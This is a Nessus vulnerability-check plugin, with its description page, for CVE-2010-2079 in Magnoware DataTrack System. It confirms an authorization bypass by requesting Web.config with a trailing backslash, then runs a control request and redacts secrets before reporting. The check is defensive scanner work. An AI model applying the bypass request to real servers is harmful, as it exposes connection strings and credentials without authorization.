
Magnoware DataTrack System Information Disclosure

This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

68.8%

The installed version of Magnoware DataTrack System is affected by an information disclosure vulnerability. By appending a backslash ('\') to a request path, an unauthenticated remote attacker can retrieve pages and files that normally require authorization. Nessus confirms the issue by fetching the application's Web.config this way; that file is never meant to be served and commonly holds connection strings and other secrets, so its exposure should be treated as a credential leak, not just a configuration read.

Although Nessus has not checked for them, the installed version is also likely to be affected by several other vulnerabilities, including cross-site scripting and directory disclosure.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
 # Plugin identity and revision.
 script_id(46866);
 script_version("1.10");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

 script_cve_id("CVE-2010-2079");

 script_name(english:"Magnoware DataTrack System Information Disclosure");
 # The only condition this plugin actually tests: Web.config fetched with a
 # trailing backslash.  The XSS / directory disclosure issues mentioned in
 # the description below are not checked.
 script_summary(english:"Attempts to retrieve Web.config with a backslash");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that is affected by an
information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The installed version of Magnoware DataTrack System is affected by an
information disclosure vulnerability.  By appending a backslash ('\\')
to a web request, it is possible for an attacker to view pages that
require authorization.

Although Nessus has not checked for them, the installed version is
also likely to be affected by several other vulnerabilities, including
cross-site scripting and directory disclosure." );

 # Vendor advisory (shortened Nessus redirect) and the public advisory the
 # plugin was written from.
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d7656775");
 script_set_attribute(attribute:"see_also", value:"https://packetstormsecurity.com/1005-exploits/datatrackserver35-xss.txt" );
 # No vendor fix was known when this was written.  Until one exists, the
 # practical mitigation is to block direct requests for Web.config (and its
 # backslash-suffixed form) at the web server or a front-end proxy.
 script_set_attribute(attribute:"solution", value:"Unknown at this time.");
 # CVSS v2: reachable from the network, no authentication, partial
 # confidentiality impact only (read access, no write/DoS).
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");

 script_set_attribute(attribute:"vuln_publication_date", value:"2010/05/17");
 script_set_attribute(attribute:"plugin_publication_date", value:"2010/06/11");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_ATTACK: the check below sends the bypass request itself rather than
 # inferring the flaw from a version banner.
 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");

 script_copyright(english:"This is script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

 # Runs only against hosts with a web service and the KB keys that the
 # detection plugin declared below is expected to populate (ASP server,
 # Magnoware vendor, DataTrack install).
 script_require_ports("Services/www", 80);
 script_require_keys("www/ASP", "www/magnoware", "www/datatrack_system");
 script_dependencies("datatrack_system_detect.nasl");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

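port = get_http_port(default:80, asp:TRUE);

# Install location recorded in the KB by datatrack_system_detect.nasl.
install = get_install_from_kb(appname:'datatrack_system', port:port, exit_on_fail:TRUE);

# The bypass is a single trailing backslash on the request path.  Web.config
# is the probe target because a web server should never serve it, so getting
# it back is unambiguous.  Single quotes: '\\' is one backslash on the wire.
url = install['dir'] + "/Web.config" + '\\';

# Upper bound on how much of the retrieved file is quoted in the report.
max_lines = 25;

# TRUE when 'body' looks like an ASP.NET Web.config.  All three markers are
# required so that an error page or login form that merely echoes
# "<configuration>" is not counted as a successful retrieval.  A Web.config
# that lacks a <compilation defaultLanguage ...> element is not recognised
# (false negative, never false positive).
function looks_like_web_config(body)
{
  return (
    '<configuration>' >< body &&
    '<system.web>' >< body    &&
    '<compilation defaultLanguage' >< body
  );
}

# Exploit the issue: request Web.config with the backslash appended.
res = http_send_recv3(port:port, method:"GET", item:url, exit_on_fail:TRUE, follow_redirect:TRUE);
if (!looks_like_web_config(body:res[2]))
  exit(0, "The DataTrack System install at "+ build_url(port:port, qs:url) + " is not affected.");

file = res[2];

# Control request without the backslash.  If Web.config is readable either
# way, the backslash is not what exposes it -- the server simply serves the
# file -- so this plugin stays silent.  That is a worse misconfiguration,
# not a clean result, and nothing here reports it; other plugins must.
# The control does not follow redirects, so a redirect to a login page
# yields a body without the markers and counts as "restricted".
# Under paranoid reporting the control is skipped and the finding rests on
# the bypass request alone.
if (report_paranoia < 2)
{
  res = http_send_recv3(port:port, method:"GET", item:install['dir'] + "/Web.config", exit_on_fail:TRUE);
  if (looks_like_web_config(body:res[2]))
    exit(0, "Access to the DataTrack System Web.config on port "+ port + " is not restricted.");
}

if (report_verbosity == 0)
{
  security_warning(port);
  exit(0);
}

report = '\n' +
  'Nessus was able to exploit this issue using the following URL : \n' +
  '\n' +
  build_url(port:port, qs:url) + '\n';

if (report_verbosity > 1)
{
  # Quote at most max_lines lines of the file.  split() keeps the line
  # terminators, so concatenation reproduces the original layout.  The
  # excerpt goes through full redaction because Web.config routinely
  # carries connection strings and other credentials that must not land
  # in a scan report verbatim.
  info = '';
  count = 0;
  foreach line (split(file))
  {
    info += line;
    count++;
    if (count >= max_lines)
    {
      info += '...';
      break;
    }
  }

  separator = crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
  report += '\n' +
    '\n' +
    'Here are the contents of the file (limited to ' + max_lines + ' lines) :\n' +
    '\n' +
    separator +
    data_protection::sanitize_user_full_redaction(output:info) +
    separator;
}

security_warning(port:port, extra:report);
exit(0);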
